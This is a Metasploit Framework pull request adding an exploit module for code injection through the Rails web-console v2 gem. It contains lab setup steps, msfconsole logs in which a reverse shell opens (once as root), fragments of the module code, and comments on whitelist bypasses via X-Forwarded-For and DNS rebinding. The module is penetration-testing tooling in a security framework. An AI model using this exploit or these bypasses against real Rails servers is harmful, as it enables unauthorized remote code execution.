### PR TITLE
Add a module to abuse the Rails web-console (v2) gem

### PR DESCRIPTION
**Pull request by hdm**
This changeset includes a new exploit module that can inject code into Ruby on Rails applications if the web-console gem is enabled and the attacker happens to be within the whitelisted IP range of the web console configuration.
## Verification

Install RoR 4.2.6, generate a new application, modify the web console whitelist to include your IP range, and start the server:

```
$ gem install rails -v 4.2.6
$ rails new taco
$ cd taco
$ vim config/environments/development.rb
 Add the following line just before the final `end' tag:
 config.web_console.whitelisted_ips = %w(0.0.0.0/0)
$ bundle
$ rails server
```

Launch msfconsole, select the exploit, set the host, set the port, get the shell:

```
msf > use exploit/multi/http/rails_web_console_v2_code_exec 
msf exploit(rails_web_console_v2_code_exec) > set RHOST <target>
msf exploit(rails_web_console_v2_code_exec) > set RPORT 3000
msf exploit(rails_web_console_v2_code_exec) > exploit 

[*] Started reverse TCP handler on 127.0.0.1:4444 
[*] Sending payload to /__web_console/repl_sessions/8160f3cd81f4b31f9dd8395a704df91d
[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:40140) at 2016-05-02 02:43:53 -0500

id
uid=1000(hdm)
```

This is a bit of a silly module, but might be useful some day, and was a fun distraction from actually writing Rails code =)

### CODE REVIEW

File: modules/exploits/multi/http/rails_web_console_v2_code_exec.rb [hunk 1]
```diff
@@ -0,0 +1,92 @@
...
+      'Arch'           => ARCH_RUBY,
+      'Privileged'     => false,
+      'Targets'        =>	[ ['Automatic', {} ] ],
+      'DefaultOptions' => { "PrependFork" => true },
+      'DisclosureDate' => 'May 2 2016',
+      'DefaultTarget' => 0))
+
+    register_options(
+      [
+        Opt::RPORT(80),
```
Comment (join-us) [inline modules/exploits/multi/http/rails_web_console_v2_code_exec.rb]: **```Opt::RPORT(3000)```** may be better than **```Opt::RPORT(80)```**.

**Comment by join-us** [comment]
If you make errors, 

```
root@lab:~/taco# rails server
/usr/local/rvm/gems/ruby-2.1.9/gems/bundler-1.11.2/lib/bundler/runtime.rb:80:in `rescue in block (2 levels) in require': There was an error while trying to load the gem 'uglifier'. (Bundler::GemRequireError)
	from /usr/local/rvm/gems/ruby-2.1.9/gems/bundler-1.11.2/lib/bundler/runtime.rb:76:in `block (2 levels) in require'
	from /usr/local/rvm/gems/ruby-2.1.9/gems/bundler-1.11.2/lib/bundler/runtime.rb:72:in `each'
	from /usr/local/rvm/gems/ruby-2.1.9/gems/bundler-1.11.2/lib/bundler/runtime.rb:72:in `block in require'
	from /usr/local/rvm/gems/ruby-2.1.9/gems/bundler-1.11.2/lib/bundler/runtime.rb:61:in `each'
	from /usr/local/rvm/gems/ruby-2.1.9/gems/bundler-1.11.2/lib/bundler/runtime.rb:61:in `require'
	from /usr/local/rvm/gems/ruby-2.1.9/gems/bundler-1.11.2/lib/bundler.rb:99:in `require'
	from /root/taco/config/application.rb:7:in `<top (required)>'
	from /usr/local/rvm/gems/ruby-2.1.9/gems/railties-4.2.6/lib/rails/commands/commands_tasks.rb:78:in `require'
	from /usr/local/rvm/gems/ruby-2.1.9/gems/railties-4.2.6/lib/rails/commands/commands_tasks.rb:78:in `block in server'
	from /usr/local/rvm/gems/ruby-2.1.9/gems/railties-4.2.6/lib/rails/commands/commands_tasks.rb:75:in `tap'
	from /usr/local/rvm/gems/ruby-2.1.9/gems/railties-4.2.6/lib/rails/commands/commands_tasks.rb:75:in `server'
	from /usr/local/rvm/gems/ruby-2.1.9/gems/railties-4.2.6/lib/rails/commands/commands_tasks.rb:39:in `run_command!'
	from /usr/local/rvm/gems/ruby-2.1.9/gems/railties-4.2.6/lib/rails/commands.rb:17:in `<top (required)>'
	from bin/rails:4:in `require'
	from bin/rails:4:in `<main>'
```

Please install **nodejs**:

```
sudo apt-get install nodejs
```

----

```
msf exploit(rails_web_console_v2_code_exec) > show options

Module options (exploit/multi/http/rails_web_console_v2_code_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.0.106    yes       The target address
   RPORT      3000             yes       The target port
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /missing404      yes       The path to a vulnerable Ruby on Rails application
   VHOST                       no        HTTP server virtual host


Payload options (ruby/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.0.102    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(rails_web_console_v2_code_exec) > run

[*] Started reverse TCP handler on 192.168.0.102:4444
[*] Sending payload to /__web_console/repl_sessions/d89c2f96387f4b9dd612c0abb7c06577
[*] Command shell session 1 opened (192.168.0.102:4444 -> 192.168.0.106:35678) at 2016-05-03 14:13:52 +0800

id
uid=0(root) gid=0(root) groups=0(root)


```

File: modules/exploits/multi/http/rails_web_console_v2_code_exec.rb [hunk 2]
```diff
@@ -0,0 +1,92 @@
...
+      ], self.class)
+
+  end
+
+  #
+  # Identify the web console path and session ID, then inject code with it
+  #
+  def exploit
+
+   res = send_request_cgi({
```
Comment (join-us) [inline modules/exploits/multi/http/rails_web_console_v2_code_exec.rb]: Use 2 (not 1) spaces for indentation.

File: modules/exploits/multi/http/rails_web_console_v2_code_exec.rb [hunk 3]
```diff
@@ -0,0 +1,92 @@
...
+      'uri'     => normalize_uri(target_uri.path),
+      'method'  => 'GET'
+    }, 25)
+
+    if ! res
+       print_error("Error: No response requesting #{datastore['TARGETURI']}")
```
Comment (join-us) [inline modules/exploits/multi/http/rails_web_console_v2_code_exec.rb]: Use 2 (not 3) spaces for indentation.

**Comment by hdm** [comment]
Thanks for the feedback, the suggested changes have been made.

**Comment by joevennix** [comment]
Nice, this is also a fun one for DNS rebinding. Also note you used to be able to use `HTTP_X_FORWARDED_FOR` to get around this: https://groups.google.com/forum/#!topic/rubyonrails-security/lzmz9_ijUFw

**Comment by wvu-r7** [comment]
A wild @joevennix appears!

**Comment by wvu-r7** [comment]
https://github.com/rapid7/metasploit-framework/commit/c15403a426aef0ea75edd0f877c6dd020a4f03c9

**Comment by wvu-r7** [comment]
@hdm, @lsato-r7: Fixes here: https://github.com/rapid7/metasploit-framework/commit/c15403a426aef0ea75edd0f877c6dd020a4f03c9.

**Comment by mubix** [comment]
Any chance of adding the attempt to use the HTTP_X_FORWARDED_FOR option as well or should it be another module?

**Comment by hdm** [comment]
Support for an X-Forwarded-For header should be added to the HTTP mixin, not this module specifically. In the case of Web Console (v2), any trusted proxy addresses will be scrubbed from the X-Forwarded-For and Client-IP headers, so this doesn't really gain anything for this module.

**Pull request merged**